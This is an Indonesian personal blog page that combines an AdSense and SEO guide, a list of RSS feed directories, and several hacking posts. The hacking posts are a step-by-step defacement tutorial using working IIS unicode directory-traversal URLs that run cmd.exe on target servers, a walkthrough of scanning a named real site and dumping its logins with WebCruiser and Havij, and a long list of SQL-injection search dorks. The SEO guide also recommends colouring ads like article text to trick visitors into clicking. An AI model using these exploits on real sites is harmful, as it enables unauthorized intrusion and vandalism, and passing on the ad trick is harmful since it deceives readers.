Andika Cyber

Welcome To My Blog Please Follow And Coment thz

Hal Yang Di Butuhkan sebelum Memasang Google Adsense


Hal yang paling utama dalam Google Adsense adalah Optimasi Blog pada Search Engine. Jadi sebelum kita berbisnis dengan Google Adsense, Blog kita harus terlebih dahulu bagus dalam Optimasi Search Engine. Minimal target kita dalam jangka waktu 3 Bulan harus mencapai pengunjung pada Blog kita 400 visitor/hari. Jadi hal pertama yang akan di bahas adalah SEO pada Blog. SEO terbagi dua ; ada Internal SEO, ada juga Eksternal SEO.


  1. Internal SEO
    Internal SEO adalah Optimasi Search Engine di dalam Blog kita sendiri. Adapun beberapa hal yang harus di perhatikan dalam Internal SEO:
    • Reset keyword
      Sebelum kita menentukan Nama Domain yang akan di gunakan, kita terlebih dahulu harus menentukan keyword utama yang akan di pakai dalam Blog kita .Artinya keyword utama itu adalah kata kunci yang sering digunakan pada Blog kita ataupun Thema yang dibahas pada Blog kita.
      Untuk melakukan pencarian keyword utama ada beberapa Tool yang harus digunakan. Diantaranya :
      https://adwords.Google.com/select/KeywordToolExternal --> Menentukan keyword dengan kompetisinya.
      http://www.Google.com/insights/search
      http://www.spyfu.com/TopList.aspx?listId=3
      http://www.keyword-finder.net/ --> Tool ini berfungsi untuk apabila kita sudah menemukan keyword utama maka gunakan Tool ini untuk menmukan keyword yang berhubungan dengan keyword utama.
    • Menentukan Nama Domain
      Dalam menentukan nama domain sebaiknya keyword utama kita ada dalam Nama Domain yang akan kita buat. Sebagai contoh keyword utama kita adalah Sepatu. Maka Nama Domain berikut dapat digunakan:
      -www.tokosepatu.Blogspot.com
      -www.sepatusport.Blogspot.com
      -www.sepatugaul.Blogspot.com
    • Meta Tag
      Meta Tag sangat berpengaruh di dalam SEO apalagi untuk Deskripsi Blog kita kedalam Search Engine dan pengenalan keyword pada Search Engine. Biasanya didalam Meta Tag ada Tiga komponen paling penting :
      -Judul Blog
      Judul Blog diusahakan sesuai dengan Nama Domain.
      -Deskripsi
      Didalam Deskripsi Blog kita diusahakan mencantumkan Tiga kata yang menjadi keyword utama. Misalakan: “Dapatkan sepatu termurah ditoko sepatu kami dengan kualitas sepatu yang bagus”
      -Keyword
      Keyword yang sudah kita riset tadi baik itu keyword utama dan anak-anaknya masukan kedalam keyword yang ada di Meta Tag
      Dalam pemasangan Meta Tag pada suatu Blog ada berbagai macam cara seperti pada Wordpress dapat menggunakan Plugin All In SEO sedangkan pada Blogspot dapat menambahkan script Meta Tag sebelum </head>. Untuk membuat Meta Tag pada Blogspot dapat menggunakan Meta Tag Generator (cari di Google).
    • Penulisan Artikel
      Blog yang digunakan untu Google Adsense buatlah minimal Sepuluh Artikel untuk Blog baru kita. Adapun cara dalam penulisan artikel untuk Google Adsense diantaranya :
      -Bahasa
      Sering kita mendengar Google Adsense harus Blog berbahasa Inggris. Memang dulu seperti itu, Cuma sekarang pake Bahasa Indonesia pun sudah bisa. Tapi tetap di sarankan menggunakan Blog berbahasa Inggris. Karena nilai earningnya jauh lebih besar ketimbang Blog berbahasa Indonesia.
      -Judul Artikel
      Pertama buat artikel dengan judul keyword utama selanjutnya buat artikel dengan judul keyword yang paling dekat hubungannya dengan keyword utama
      -Bold Pada Isi Artikel
      Didalam penulisan artikel tentunya akan memiliki atau mencantumkan beberapa keyword. Diusahakan baiknya keyword yang ada di isi artikel di cetak tebal (Bold).
      -Internal Link
      Didalam Blog kita ada rumus yang harus diterapkan pada Blog baru untuk memulai Google Adsense dalam pengaturan Internal Link : “1-1,1-2,1-3,1-4,1-5,1-6,1-7,1-8,1-9.1-10”. Rumus itu artinya diusahakan pada tiap artikel mengandung keyword utama. Setiap keyword utama itu pada isi artikel harus me-Link/dibuat tautan menuju ke judul keyword utama. Lihatlah bagaimana Wikipedia, Blog kitapun diusahakan harus begitu dalam teknik Internal Link.
      -Eksternal Link
      Untuk Blog baru sebaiknya jangan ada Link Blog lain didalam Blog kita, artinya komentingpun didalam Blog kita harus ditutup. Adapun untuk selanjutnya ada Eksternal Link itu harus menuju ke Blog lain kita yang dibuatkan untuk bisnis Google Adsense juga. Tentunya Blog lain kita yang berhubungan dengan Blog yang sedang kita buat sekarang.
    • Pengaturan Thema
      Didalam Blog untuk bisnis Google Adsense Thema Blog sangat diperhitungkan. Adapun teknik-teknik dalam pengaturan Thema adalah sebagai berikut :

      -Akses Thema Cepat
      Kita mesti memilih Thema untuk Blog kita yang tingkat loadnya sangat kecil artinya agar mudah di akses dengan koneksi yang agak lelet sekalipun
      -Thema yang cocok untuk penempatan Google Adsense
      Dalam pemilihan Thema sebaiknya cari Thema yang cocok untuk penempatan iklan Google Adsense. Biasanya pada Platform Blog baik itu Wordpess ataupun Blogspot sudah banyak yang menyediakan Thema yang khusus digunakan untuk Google Adsense, caranya cari di Google dengan kata kunci “ Theme Wordpress/Blogspot For Google Adsense”.
      -Pewarnaan Thema
      Dalam pemilihan warna Thema dan warna iklan Google Adsense harus sesuai. Diusahakan iklan menyamai warna teks pada Thema kita. Ini dimaksudkan untuk membuat si pengunjung yang awam berfikir bahwa iklan kita bagian dari isi artikel dan kemudian ia mengkliknya.
      -Navigator
      Alangkah baiknya Blog kita juga di sertai menu-menu di atasnya dengan menu yang biasa di pake seperti ; About, FAQ, Our Service, Cantact, dll. Ini dimaksudkan supaya Blog kita terlihat lebih nyata dan ketika di daftarkan di Google Adsense bisa membantu dalam proses penerimaannya.
    • Pemasangan Webmaster Tool dan Google Analytics
      Setelah Blog kita siap untuk diluncurkan, sebelumnya harus terdaftar pada Webmaster Tool dan Google Analytic. Ini dimaksudkan untuk agar kedepannya kita bias mengontrol atau mengetahui aktifitas pada Blog kita. Seperti mengetahui jumlah pengunjung perhari, banyaknya Link dari Blog lain ke Blog kita, dan masih banyak kegunaan lainnya. Untuk membuat akun pada webmaster Tool dan Google Analytic anda tinggal mengdaftar di Link ini ;
      -Webmaster Tool ; https://www.Google.com/webmasters/Tools/
      -Google Analytic ; http://www.Google.com/analytics/
      Dalam pembuatan akun tersebut kita hanya perlu konfirmasi dengan cara memasang script yang diberikan Google ke dalam Source Code Blog kita atau Hostingan kita.
  2. Eksternal SEO
    Pada dasarnya Eksternal SEO tidak lebih hanya penempatan Link kita pada Blog orang lain. Orang-orang biasa menyebutnya dengan Back Link (BL) namun dalam pembuaatan Link pada Blog lain yang menuju Blog kita ada berbagaI macam cara. Ada yang menggunakan fasilitas Social Network, Social Bookmarking, Blog direktori, Sampai pada hal yang paling malas sekalipun yaitu commenting secara manual ke Blog lain yang sejenis.

    • Pemanfaatan Social Networking
      Untuk menarik pengunjung ke Blog kita bisa memanfaatkan media ini seperti Facebook dan Twitter. Cara ini bukan hanya cara lumayan lagi, tapi sudah merupakan hal yang paling penting dalam pemasaran Blog kita selain menggunakan jasa Search Engine. Dalam pemanfaatan media Social Network tidak perlu bersaing/kompetensi dengan Blog lain dalam penentuan keyword. Kita hanya cukup memperbanyak teman/fans dan selalu mencantumkan Link artikel Blog kita pada media Social Networking. Adapun cara atau tips and trik dalam pemanfaatan media ini ;
      -Berteman yang Efektif di Facebook
      Intinya semakin banyak Teman maka akan semakin besar peluang untung mendatangkan pengunjung pada Blog kita. Adapun pemilihan Teman di usahakan jangan sembarangan, tapi harus sesuai dengan kriteria yang menjadi keyword utama pada Blog kita. Misalkan Blog kita tentang Sepatu maka Search Group atau Fans Page yang membahas soal Sepatu dan kita mencari/add Teman dari sana.
      -Facebook Fans Page
      Kita juga di usahakan dan harus membuat Fans Page sendiri untuk Blog kita. Ini nantinya yang akan dijadikan media utama dalam pemasaran Blog kita di Facebook.
      -Facebook dan Twitter Syndicat
      Ini maksudnya ketika kita mengupdate tulisan kita maka akan secara otomatis terupdate pula Link yang menuju ke tulisan kita dari Facebook dan Twitter. Caranya yaitu mendaftarkan Blog kita pada https://apps.facebook.com/Blognetworks dan menuju menu syndicat untuk menentukan ke akun mana saja Blog kita akan di syndicat. Biasanya di syndicat ke Profil Facebook kita, Fans Page dan akun Twitter.
      Setelah Fans Page di buat kemudian Twitter dan kita terdaftar di Blognetworks untuk melakukan syndicat maka akan secara otomatis setiap kita meng-Update artikel akan ada Linknya di account-account tersebut. Sangat simple tidak perlu mengupdate status sendiri dengan menyertakan Link artikel yang telah kita update.
      Paling kedepannya tugas kita hanya mencari Teman dan Fans setiap harinya. Dan ini kadang menjadi kendala, kendalanya yaitu bosan. Tapi mau bagaimana lagi kalau mau sukses harus seperti itu.
    • Blog Direktory
      Untuk lebih efektif lagi Blog kita harus terdaftar sebanyak-banyak di layanan Blog directory. Intinya tetap sama untuk membuat Link ke artikel kita secara otomatis dari web penyedia layanan Blog directori. Tapi paling utama daftarkan dulu di RSS Feed.

      Untuk mencari layanan Blog directory dapat mencarinya di Google dengan kata kunci “Blog Direktory” atau “Blog directory terbaik”. Adapun Blog directory yang katanya sangat bagus yaitu dmoz.org, Cuma untuk daftarnya sangat jarang orang di approve/diterima oleh layanan itu. Karena layanan tersebut dalam penerimaannya tidak menggunakan mesin, tapi di periksa oleh manusia dan mereka sangat hati-hati dalam penerimaan untuk menjadi membernya, saingannya pun sangat ketat.
    • Terdaftar di Search Engine
      Ini sudah sering kita dengan, tidak perlu di bahas lebih dalam lagi. Seperti Google, Yahoo, Bing yang wajib Blog kita terdaftar di sana. Bila perlu ada Search Engine yang lainnya lebih bagus lagi, kita ikut daftar juga disana.
    • Back Link (BL)
      Untuk Blog baru kita sebaiknya kita berburu Back Link dari Blog PR 7 kemudian commenting ke Blog yang sejenis dan berburu Back Link dari web pemerintah (go.id) dan akademi (ac.id). Dalam berburu back Link ini tidak secara otomatis seperti bahasan sebelumnya. Tapi ini kerja keras kita sendiri secara manual dan kedepannya akan menerima tantangan kebosanan karena akan menjadi rutinitas kita setiap harinya. Semakin banyak Back Link semakin bagus web kita terindex di Search Engine.
  3. Pemeliharaan SEO
    • Posting Setiap Hari
      Di usahakan setelah Internal dan Ekternal SEO kita kerjakan untuk rutin meng-update artikelnya setiap hari. Ini sangat berpengaruh dalam ilmu SEO, apalagi supaya di kenal Google kalau Blog kita selalu aktif bekerja setiap harinya, otomatis trafficnya pun akan selalu naik.
    • Commenting
      Dalam masalah commenting ada juga sedikit tips and triknya. Pertama setelah kita update artikel di usahakan Googling dengan kata kunci judul artikel kita. Kemudian cari web 20 teratas di hasil pencarian yang bisa di masuki comment. Kemudian kita mengomentarinya dengan menyertakan Link yang menuju artikel yang baru saja kita update. Itu maksimal 20 Blog dalam setiap harinya kita komentari. Tapi di usahakan jangan Spam comment, comment pun harus sedikit berbobot, sedikitnya mengikuti pembahasan dalam isi artikel yang kita komentari. Jika tidak akan di anggap Spam, semakin banyak Spam maka ancaman Ban pada Blog kita semakin besar.
    • Social Bookmarking
      Selain commenting, kita juga jangan lupa selalu Bookmarking artikel yang telah kita update. Banyak penyedia fasilitas Bookmarking tinggal di cari di Google. Kalau untuk pengguna Blogspot ada fasilitas sendiri untuk melakukan bookmarking, jadi lebih simple tinggal di share melalui fasiltas itu saja.
    • Hindari Cara Ilegal
      Ada banyak orang yang ingin kaya mendadak kaya dan tidak susah-susah bekerja banyak. Salah satunya di dalam bisnis Google Adsense. Banyak cara cepat dalam mencari uang di Google Adsense tapi cara itu tidak di kehendaki oleh Google. Diantaranya :
      -Auto Blog
      Kita dengar dengan istilah auto Blog yaitu Blog yang secara otomatis mengupdate artikelnya sendiri. Seperti pada Wordpress yang menggunakan Plugin WP Robot. Sebaiknya hal ini jangan di lakukan, karena sekarang Google makin pintar, kalau ketahuan bisa di Ban Blog kita. Ini sudah sering terjadi Blog mantan Banned yang melakukan hal itu.
      -Copy Paste
      Di usahakan artikel yang di muat di Blog kita untuk bisnis Google Adsense menggunakan artikel buatan sendiri yang belum ada artikel yang serupa sebelumnya. Jika kita hanya mengandalkan CoPas (Copy Paste), Google tidak menghendaki hal itu. Kalau ketahuan Blog kita terancam Banned. Banyak juga kejadian orang yang hanya bisa CoPas di Banned Blognya di kemudian hari. Adapun kita punya Blog mantan Banned terus artikelnya kita tulis ulang/CoPas ke Blog baru kita dengan Nama Domain yang baru, tetap saja hal itu tidak dikehendaki oleh Google.
      -Back Link Otomatis
      Ada sering Blogger menggunakan Tool-Tool untuk memperoleh Back Link secara otomatis dengan mudah. Hanya memasukan Link Blog kita maka akan secara otomatis kita dapat BL dari sekian Blog ternama. Ini juga tidak di kehendaki oleh Google, banyak kejadian Blogger yang melakukan hal ini dikemudian hari Blognya di Ban.



Setelah kita melakukan yang sudah ditulisan di atas selama 3 bulan. Lihat hasilnya apa yang terjadi? Jika visitor perharinya sudah mencapai 400 maka segera daftarkan Blog kita di Account Google Adsense (Bagi yang belum punya Account). Kenapa harus 400, bukan kah di awal juga bisa? Memang bisa dari awal juga, syarat mendaftar di Account Google Adsense hanya sebatas artikel minimal sepuluh, domain tingkat tinggi (.com, .org, .net), dan penampilan, menu-menu Blog memadai.
Blog Fresh kita akan bisa saja di terima oleh Google Adsense, tapi akankah menghasilkan uang? Tentunya tidak akan banyak. Maka dari itu baiknya kita memasang Iklan Google Adsense setelah pengunjung lumayan banyak.
Dalam optimasi Blog fresh/baru ini yang bisa saya ketahui. Saya juga tahu ini dari orang yang sudah berpengalaman. Walaupun secara keseluruhan belum saya lakoni, tapi cara berfikir saya mudahan-mudahan ada manfaatnya di mata para Blogger pemula yang ingin menjadikan Blognya sebagai lahan bisnis.


Daftarkan Feed Blog Ke RSS Directories

Memiliki blog dan sharing ilmu pengetahuan ataupun pengalaman tentunya dipersembahkan bagi pembaca/pengunjung blog. Tanpa pembaca blog yang loyal dan respon mereka, tentunya blog tidak akan berkembang ke bentuk apapun. Traffic blog atau pageview blogpun akan susah meningkat, Pengunjung loyal biasanya tidak datang dari search engine, melainkan mereka yang datang melalui feed subscriptionfollowsocial mediadirektori blog maupun social bookmark.  Dari beberapa cara tersebut, yg paling memberikan kontribusi cukup baik adalah feed subscription melalui RSS feed. Karena pembaca akan langsung mendapatkan notifikasi dari email atau dari feed direktori dimana mereka berlangganan. Promosi blog serta konten blog pun akan jauh lebih lengkap apabila kita menggunakan RSS directories. So, untuk menambah pelanggan feed, menggunakandirektori feed sebagai agregator dan promotor blog adalah hal yang sangat penting.

Berikut ini adalah 30+ feed directories ternama yg sudah saya pilihkan untuk sobat semua. Sebelum mendaftarkan, seperti halnya mendaftarkan blog di direktori blog, persiapkan terlebih dahulu data-data seperti: 
1. URL feed blog, biasanya untuk blogger/blogspot diakhiri dengan /feeds/posts/default (atom), contoh: http://buka-rahasia.blogspot.com/feeds/posts/default, atau bisa juga digunakan url feed yang telah diconvert ke feedburner (contoh: http://feeds.feedburner.com/blogspot/bukarahasia), 
2. Nama Blog
3. Deskripsi blog (jika diperlukan/disyaratkan)
4. Tag (jika diperlukan)
5. Url Blog (jika diperlukan/disyaratkan)
6. Alamat email ((jika diperlukan/disyaratkan, untuk konfirmasi pendaftaran)
7. Nama akun (jika diperlukan/disyaratkan)

Guna memudahkan pendaftaran, cari link-link untuk menuju form pendaftaran yg biasanya dituliskan seperti ini: "Submit Feed", "Suggest Feed", "Add a Feed", "Submit Blog", "Suggest Blog", "Add Blog", dll. Sebagian besar dari direktori RSS feed di bawah membutuhkan pendaftaran akun, sebagian kecil lainnya dapat langsung mendaftarkan URL feed. So, inilah daftar direktori RSS feed-nya:
  1. Plazoo.com
  2. blogbal.com
  3. RSSmicro.com
  4. RSSMountain.com
  5. www.feedage.com
  6. www.feedcat.net
  7. www.feedlisting.com
  8. findrss.net
  9. www.rssmotron.com
  10. ReadABlog.com
  11. GoldenFeed.com
  12. BlogDigger.com
  13. WeBlogAlot.com
  14. chordata.info
  15. BlogPulse.com
  16. IceRocket.com
  17. RSS-Network.com
  18. feeds2read.net
  19. www.feedplex.com
  20. www.syndic8.com
  21. www.wingee.com
  22. www.yodpod.com
  23. www.newsisfree.com
  24. www.newzalert.com
  25. www.rssbuffet.com
  26. www.rsstop10.com
  27. www.redtram.com
  28. www.oobdoo.com
  29. www.topix.net
  30. www.5z5.com
  31. www.feedmailer.net
Beberapa direktori rss feed bahkan memiliki SEO dan terindeks search engine dengan baik serta mengarah langsung ke link blog sehingga menambah visibilitas blog di search engine. So daftarkan segera blog anda di direktori feed di atas!

Good luck and have a nice Blogging!

Deface Dengan menggunakan Microsoft IIS

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)


Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.


*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

search bugs via webcruiser + Deface tutorial

[TUTOR] search bugs via webcruiser + pepes !


berhubung ane baik hati ., langsung aja ane share di mari

download di sini dulu toolsnya kk ., webcriuser


dalam contoh ini ane ambil contoh : http://radiantbusiness.co.za/
cara kerja :

1. buka dulu toolsnya .,

2. silahkan kk masukan target pada bagian url .. dan klik scan site .,
Spoiler: hide
[Image: 432329_264363583642864_100002076733212_6...0492_n.jpg]

3. nantinya akan muncul kelemahan2 web yang kk udah scan tadi
Spoiler: hide
[Image: 432329_264363586976197_100002076733212_6...1815_n.jpg]

4. langkah lanjut ., kk bisa pake havij apa manual aja .. terserah deh ., tapi disini ane makenya havij ..

5. masukan bug web target yang kita dapat tadi ! dan crootz username + passwordna ketemu ..!.,
Spoiler: hide
[Image: 432329_264363590309530_100002076733212_6...9191_n.jpg]

6. selanjutnya terserah dah mau dibuat apa tu web .
Spoiler: hide
[Image: 432329_264363596976196_100002076733212_6...9644_n.jpg]

 sekian dulu dari aku ., semoga bermanfaat ., 

Daftar Dork Yang Masih Ampuh



Daftar Dork Yang Masih Ampun Dan Masih Digunakan Banyak Web, Sbb :

Spoiler:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
